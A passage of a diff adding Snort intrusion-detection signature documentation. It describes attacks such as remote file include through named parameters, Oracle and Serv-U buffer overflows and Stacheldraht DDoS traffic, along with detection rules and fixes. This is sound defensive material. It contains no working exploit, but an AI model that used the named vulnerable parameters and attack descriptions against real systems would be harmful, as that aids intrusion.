+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1199.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1199
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000343.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000343
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "credits.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "credits.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1255.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1255
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2700.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2700
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure numtoyminterval.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2340.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2340
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with RhinoSoft Serv-u FTP Server CHMOD 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+Serv-u offers FTP servers for Windows hosts. A vulnerability exists 
+with the CHMOD command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the CHMOD 
+command.
+
+--
+Affected Systems:
+	RhinoSoft Serv-u FTP Server prior to version 4.2 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the CHMOD 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1639.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1639
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/2816.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2816
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_object_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/226.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+226
+
+--
+Summary:
+This event indicates that a Stacheldraht handler exists on the source host and an agent on the destination host.
+
+--
+Impact:
+Serious. A Distributed Denial of Service attack maybe in progress.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to 
+coordinate and participate in a denial of service attack.  There are 
+"handler" hosts that are used to coordinate the attacks and "agent" 
+hosts that launch the attack.  When a host becomes a Stacheldraht agent 
+it makes an initial contact with each of its known handlers.  A handler 
+should respond with an ICMP echo reply with an ICMP identification 
+number of 667 and a string of "ficken" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A host on which a Stacheldraht agent has been installed attempts to 
+contact the list of known handlers.   
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Turn of all unnecessary services on hosts.
+
+Upgrade to the latest patch level.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS191
+
+--
--- /dev/null
+++ b/doc/signatures/1427.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1427
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
--- /dev/null
+++ b/doc/signatures/1535.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1535
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000830.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000830
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "dayprune" parameter in the "index.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000581.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000581
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_hidden.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_hidden.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1234.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1234
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3122.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3122
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3455.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3455
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Bontago Game Server.
+
+--
+Impact:
+Serious. Code execution and Denial of Service (DoS) are possible.
+
+--
+Detailed Information:
+The Bontago game server does not properly sanitize user nicknames.
+Sucessful exploitation of this error may present an attacker with the
+opportunity to overflow a buffer which may then lead to remote code
+execution and possible DoS.
+
+--
+Affected Systems:
+	Bontago Game Server 1.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply a nickname to the server that exceeds the static
+buffer length assigned to handle this value.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1129.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+1129
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+".htaccess" from a web server.
+
+--
+Impact:
+If this request is successful, it could provide an attacker with 
+valuable information needed to compromise the website.
+
+--
+Detailed Information:
+Most UNIX based web servers, such as Apache and Netscape Enterprise 
+Server, use ".htaccess" files to customize security settings on a 
+per-directory level. These files can specify things like what users 
+have access to what resources, hosts that are allowed or denied, and 
+what type of authentication system to use.   This type of data would be 
+most useful for carrying out an attack on the site.   Fortunately, all 
+modern web servers deny client access to these files by default.
+
+--
+Affected Systems:
+Any system that uses ".htaccess" files and which have misconfigured the 
+server to allow client access to them.
+
+--
+Attack Scenarios:
+This is an information gathering operation which could facilitate an 
+attack.
+
+--
+Ease of Attack:
+It is simple to send a request for this file, but the request would only
+be successful if the file exists and the server allows access to it.
+
+--
+False Positives:
+While unlikely, certain web servers that are set up to host multiple 
+users' sites may allow access to this file by the site owners.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+First determine if the attack is successful by requesting the file 
+yourself. If the request is granted, ensure that your web server is 
+configured to deny access to all files that begin with ".ht".
+
+The default configuration for the Apache HTTP Server should include the 
+following section to prevent access to .ht files:
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+-- 
+Additional References:
+
+Webdeveloper.com
+http://www.webdeveloper.com/servers/servers_htaccess_magic.html
+
+--
--- /dev/null
+++ b/doc/signatures/2803.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2803
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_instantiation
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000673.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000673
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "web_statsConfig.php" using a remote file being passed as 
+the "php_ext" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "php_ext" parameter in the "web_statsConfig.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1572.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1572
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/964.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event is generated when an attempt is made to retrieve the file
+users.pwd. This file contains user password information.
+
+--
+Affected Systems:
+	Windows 98 using Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;144190
+
+--
--- /dev/null
+++ b/doc/signatures/2486.txt
@@ -0,0 +1,63 @@
+Rule:
+alert udp $EXTERNAL_NET any -> $HOME_NET 500 (msg:"DOS ISAKMP invalid
+identification payload attempt";  content:"|05|"; offset:16; depth:1;
+byte_test:2,>,4,30; byte_test:2,<,8,30; reference:bugtraq,10004;
+classtype:attempted-dos; sid:2486; rev:1;)
+
+--
+Sid:
+2486
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a denial of service
+(DoS) associated with tcpdump decoding of an isakmp payload.
+
+--
+Impact:
+A successful attack may cause a DoS of the host running tcpdump.
+
+--
+Detailed Information:
+The tcpdump decode of an isakmp packet with an identification payload may be
+susceptible to a DoS attack.  This occurs because the code does not properly
+convert the payload length field from network-to-host byte order. This may
